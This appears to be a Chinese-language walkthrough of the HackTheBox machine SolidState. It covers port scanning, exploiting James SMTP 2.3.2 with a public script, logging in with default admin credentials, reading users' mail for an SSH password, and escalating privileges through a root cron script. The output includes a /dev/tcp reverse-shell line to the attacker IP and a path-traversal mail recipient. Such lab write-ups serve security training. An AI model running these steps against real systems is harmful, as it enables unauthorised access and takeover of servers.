1 信息收集
NMAP
┌──(root㉿serven)-[~]
└─# nmap -p 0-65535 -A 10.129.224.177
Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-05 00:52 CST
Host is up (0.063s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3?
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
119/tcp open nntp?
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
4555/tcp open rsip?
Device type: firewall
Running (JUST GUESSING): Fortinet embedded (90%)
OS CPE: cpe:/h:fortinet:fortigate_200b
Aggressive OS guesses: Fortinet FortiGate 200B firewall (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.29 ms 10.129.224.177
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8353.87 seconds
- 22 – SSH 服务
- 25 – SMTP 服务
- 80 – Apache 服务器
- 110 – pop3,使用该端口在SMTP服务器上发送和接收电子邮件。
- 119 – nntp(网络新闻传输协议),用于在新闻服务器之间传输 Usenet 新闻文章(netnews),以便最终用户客户端应用程序可以发布/阅读文章。
- 4555 – RSIP,用于列出SMTP服务器的用户并进行管理。
80 端口
页面功能点多为静态页面,无可利用点
目录扫描
扫描到的目录无可利用点
25、110、119、4555 端口
telnet 10.129.254.59 25
发现James SMTP 2.3.2,搜索James 2.3.2 版本相关漏洞
james 2.3.2 漏洞利用
脚本执行完成,输出显示需要在登录SSH情况下,才会监听到shell,但是现在没有账号密码进行SSH登录,所以下一步就是寻找是否存在可进行SSH连接的账号密码
python3 50347.py 10.129.254.59 10.10.14.25 4444
SSH 凭据测试
4555 端口为James的管理端口,测试4555端口,使用默认账号密码 root:root 登录,默认凭据登录成功
输出提示,使用HELP命令可以查看可运行命令
listusers 命令:输出 james、thomas、john、mindy、mailadmin 账户
setpassword 命令:可以更改用户密码,root权限下有权限更改其他用户的密码。
使用端口 110 查看各个用户的电子邮件,john存在1封电子邮件,mindy存在两封
在mindy的第二封电子邮件中,存在 mindy:P@55W0rd1!2@ 用于SSH访问
SSH凭据登录
(base) gryphon@wsdl HTB %ssh mindy@10.129.254.59
mindy@10.129.254.59's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jun 5 00:48:32 2024 from 10.10.14.25
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
errorMessagetLjava/lang/String: No such file or directory
-rbash: L
lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
Message-ID: <32339690.0.1717559978216.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.14.25 ([10.10.14.25])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 1016
for <../../../../../../../../etc/bash_completion.d@localhost>;
Tue, 4 Jun 2024 23:58:47 -0400 (EDT)
Date: Tue, 4 Jun 2024 23:58:47 -0400 (EDT)
From: team@team.pl
: No such file or directory
-rbash: connect: Connection refused
-rbash: /dev/tcp/10.10.14.25/4444: Connection refused
-rbash: $'\r': command not found
mindy@solidstate:~$
但是这个 SSH 访问受到限制,很多命令无法执行
但是在之前利用James 2.3.2 RCE时,输出显示:在SSH登录时,就会转向一个shell,查看之前执行的监听,确实收到一个shell
2 权限提升
使用 LinEnum.sh 进行信息收集
在 /opt 目录下存在 tmp.py,以root身份每3分钟运行一次,将反向shell写入tmp.py,在三分钟后即可获得反向shell
341
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
